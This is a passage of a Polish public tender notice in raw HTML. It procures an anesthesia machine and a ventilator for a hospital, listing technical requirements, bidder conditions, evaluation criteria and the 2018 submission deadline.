Wysokiej częstości oddechowej51	Bezdechu 52	Hierarchia alarmów w zależności od ważności53	Pamięć alarmów i zdarzeń z ich opisem, minimum 500 zdarzeńINNE54	Nebulizator do respiratora, 55	Ramię przegubowe, uchylne do układu oddechowego pacjenta wraz z szyną boczną do mocowania akcesoriów56	Obsługa poprzez ekran, przyciski i pokrętłoINNE57	Wymagane menu i instrukcja obsługi w j. polskim58	Gwarancja 10-letniego dostępu do części zamiennych59	Produkt fabrycznie nowy, rok produkcji - 2016 60	Gwarancja min. 36 miesiące61	Gwarancja liczona od daty podpisania protokołu odbioru przez Zamawiającego62	Paszport techniczny63	Bezpłatne przeglądy techniczne w okresie gwarancji. Częstotliwość przeglądów zgodnie z zaleceniami producenta64	Bezpłatne szkolenie personelu (pielęgniarskiego i lekarskiego ) w zakresie obsługi i dezynfekcji.65	Serwis techniczny gwarancyjny pogwarancyjny prowadzony przez autoryzowany serwis.66	Sprzęt zastępczy w sytuacji naprawy dłuższej niż 5 dni67	Czas reakcji serwisu - do 48 godzin od daty powiadomienia68	Gwarancja minimum 36 miesiące OCENIANE36 miesiące - 0 pktwięcej niż 36 miesięcy do 48 miesięcy - 5 pktwięcej niż 48 miesięcy do 60 miesięcy - 10 pkt</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">33100000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">129000,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">21</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa warunku udziału w postępowaniu.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa warunku udziału w postępowaniu.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w pkt 5.2.1. lit. c) SIWZ, jeżeli wykaże, że:a)	wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:Pakiet nr 1 - co najmniej 2 dostawy sprzętu medycznego - aparatu do znieczulania, każda o wartości nie niższej niż 1 00 000,00 PLN bruttoPakiet nr 2 - co najmniej 2 dostawy sprzętu medycznego - respiratora, każda o wartości nie niższej niż 40 000,00 PLN brutto</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniuzamawiający Sąda następujących dokumentów: 1) odpisu z właściwego rejestru lub z centralnejewidencji i informacji o działalności gospodarczej, jeSeli odrębne przepisy wymagają wpisu dorejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na odstawie art. 24 ust. 5 pkt 1 Pzp; 2) oświadczenia wykonawcy zgodnie z załącznikiem nr 3 do SIWZ</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">oświadczenie o przynaleSności lub braku przynaleSności do tej samej grupy kapitałowej, o którejmowa w art. 24 ust. 1 pkt 23 Pzp stanowi Załącznik nr 7 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda:a)	Oznakowania sprzętu Certyfikatem CEb)	Opis techniczny w języku polskimc)	Prospekt (ulotka w języku polskim)Wykonawca, który z przyczyn niezależnych od niego, nie ma możliwości uzyskania dokumentów, o których mowa w pkt 7.1 może złożyć inne dokumenty dotyczące odpowiednio zapewnienia jakości lub środków zarządzania środowiskowego, potwierdzające stosowanie przez wykonawcę środków zapewnienia jakości zgodnych z wymaganymi normami zapewniania jakości lub środków zarządzania środowiskowego równoważnych środkom wymaganym na mocy mającego zastosowanie systemu lub norm zarządzania środowiskowego</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin zapłaty</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Parametry techniczne</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-07-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Pakiet nr 1 - Aparat do znieczulania </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>APARAT DO ZNIECZULANIAPARAMETRY OGÓLNE1. Zasilanie elektryczne 230 V / 50 Hz	TAK 2. Aparat na podstawie jezdnej, TAK 3. Hamulec centralny	TAK 4. Trzy szuflady na akcesoria	TAK 5. Jedna z szuflad zamykana na klucz/zamek szyfrowy, podać	TAK/NIE Tak - 1 pktNie - 0 pkt6. Blat do pisania, wbudowane oświetlenie, płynna regulacja natężenia światła	TAK 7. Uchwyty fabryczne do 10L butli tlenowej i podtlenku azotu, butle ustawiane z tyłu aparatu (bez butli)	TAK 8. Dodatkowe gniazda elektryczne 230 V z tyłu aparatu (minimum 3) podać	TAK 9. Zasilanie gazami: N2O, O2, Powietrze, z sieci centralnej, w zestawie węże wysokociśnieniowe o długości 5 m	TAK 10. Awaryjne zasilanie elektryczne całego systemu na minimum 45 minut w każdych warunkach, (akumulator/bateria wbudowane, nie dopuszcza się zewnętrznych źródeł zasilania) podać	TAK 11. Awaryjne zasilanie elektryczne całego systemu w typowych warunkach powyżej 100 minut, (akumulator/bateria wbudowane, nie dopuszcza się zewnętrznych źródeł zasilania), podać	TAK/NIE Tak - 1 pktNie - 0 pkt12. Reduktory do butli O2 i N2O, nakręcane (połączenie gwintowe), wyposażone w przyłącza do aparatu	TAK 13. Ssak inżektorowy napędzany powietrzem lub tlenem z sieci centralnej, zasilanie ssaka z przyłączy w aparacie, regulacja siły ssania, zbiornik na wydzielinę, zbiornik zapasowy, dwa zbiorniki na wydzielinę o łącznej objętości minimum 1200 ml.	TAK 14. W dostawie jednorazowe wkłady na wydzielinę - 25 szt., jednorazowe dreny do odsysania - 25 szt.	TAK SYSTEM DYSTRYBUCJI GAZÓW15. Precyzyjne, elektroniczne przepływomierze dla O2, N2O, Powietrza, możliwa precyzyjna prezentacja przepływu ze skokiem 10 ml/min	TAK 16. Mechaniczny sumaryczny przepływomierz świeżych gazów	Tak 17. System automatycznego utrzymywania minimalnego stężenia tlenu w mieszaninie oddechowej z N2O, na poziomie, co najmniej 23%, podać	TAK UKŁAD ODDECHOWY18. System oddechowy, okrężny, do wentylacji dorosłych i dzieci	TAK 19. Elementy systemu oddechowego mające styczność z mieszaniną oddechową pacjenta, w tym czujniki przepływu, nadają się do sterylizacji parowej (nie dotyczy jednorazowych układów rur, linii próbkujących)	TAK 20. Jeden dodatkowy/zapasowy czujnik przepływu	TAK 21. W 